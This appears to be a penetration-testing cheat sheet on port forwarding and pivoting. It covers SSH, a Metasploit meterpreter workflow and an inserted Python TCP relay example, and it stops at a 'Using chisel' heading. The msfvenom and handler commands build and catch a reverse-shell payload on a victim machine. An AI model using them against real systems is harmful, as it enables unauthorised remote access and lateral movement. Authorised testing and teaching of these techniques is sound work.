
Pivot & Port forwarding

Port forwarding

The example.com machine has a web server listening on port 8000 internally only (not exposed to the internet). With either of the following setups you can reach that web server from your own machine at http://localhost:4444.

Using SSH

ssh -L 4444:127.0.0.1:8000 user@example.com

Using metasploit (meterpreter)

  • Generate the exploit with msfvenom.
$ msfvenom -p 'linux/x64/meterpreter_reverse_tcp' LHOST=10.132.0.2 LPORT=9001 -f elf > exploit.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1037272 bytes
Final size of elf file: 1037272 bytes

$ file exploit.bin
exploit.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
  • Setup listener
$ msfconsole
...
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST ens4
LHOST => 10.132.0.2
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.132.0.2:9001
[*] Meterpreter session 1 opened (10.132.0.2:9001 -> 10.154.0.2:45462 ) at 2021-10-19 19:27:31 +0000

meterpreter >
  • Do port forwarding
meterpreter > portfwd add -l 4444 -p 8000 -r 127.0.0.1
[*] Local TCP relay created: :4444 <-> 127.0.0.1:8000
meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local           Remote        Direction
   -----  -----           ------        ---------
   1      127.0.0.1:8000  0.0.0.0:4444  Forward

1 total active port forwards.

meterpreter > portfwd delete -l 4444 -p 8000 -r 127.0.0.1
[*] Successfully stopped TCP relay on 0.0.0.0:4444

  • -l : Port on your local machine (attacker machine) that the relay listens on.
  • -p : Port on the remote machine (victim machine) to forward to.
  • -r : Target host, as reached from the remote machine (127.0.0.1 here, i.e. the remote machine itself).
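To show what `ssh -L` and `portfwd add` are doing under the hood, here is an added example (not part of the original notes, and not OpenSSH's or Metasploit's code): a minimal userspace TCP relay in Python that listens on a local port and copies bytes both ways to the target, the same shape as `portfwd add -l 4444 -p 8000 -r 127.0.0.1`. It assumes Python 3.8+ and only touches loopback; `relay_roundtrip` exercises it against a constructed local echo service standing in for the internal port-8000 server.

```python
import contextlib
import socket
import threading

def _pump(src, dst):  # copy src -> dst until EOF, then half-close dst so the EOF propagates
    with contextlib.suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
    with contextlib.suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def _handle(client, remote_host, remote_port):  # one relayed connection, both directions
    try:
        upstream = socket.create_connection((remote_host, remote_port))
    except OSError:
        return client.close()  # target unreachable: drop the client instead of hanging it
    with client, upstream:
        back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        back.start()
        _pump(client, upstream)
        back.join()

def _accept_loop(host, port, on_conn):
    # Serve each accepted connection with on_conn in its own thread until accept() fails (listener closed).
    ls = socket.create_server((host, port))
    def loop():
        while True:
            try:
                conn, _ = ls.accept()
            except OSError:
                return
            threading.Thread(target=on_conn, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return ls

def start_relay(local_port, remote_host, remote_port):
    # Same shape as `portfwd add -l local_port -p remote_port -r remote_host`; port 0 = any free port.
    return _accept_loop("127.0.0.1", local_port, lambda c: _handle(c, remote_host, remote_port))

def relay_roundtrip(payload):
    # Constructed demo: a local echo service stands in for the internal port-8000 server.
    svc = _accept_loop("127.0.0.1", 0, lambda c: _pump(c, c))
    relay = start_relay(0, "127.0.0.1", svc.getsockname()[1])
    with socket.create_connection(relay.getsockname()) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # done sending; read until the echoed EOF arrives
        received = b"".join(iter(lambda: c.recv(4096), b""))
    for s in (relay, svc):
        s.close()
    return received
```

Everything the client sends reaches the target unchanged and the target's reply comes back the same way, which is also why a relay like this leaves the forwarded service's own logs showing only the relay host as the client.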

Using chisel
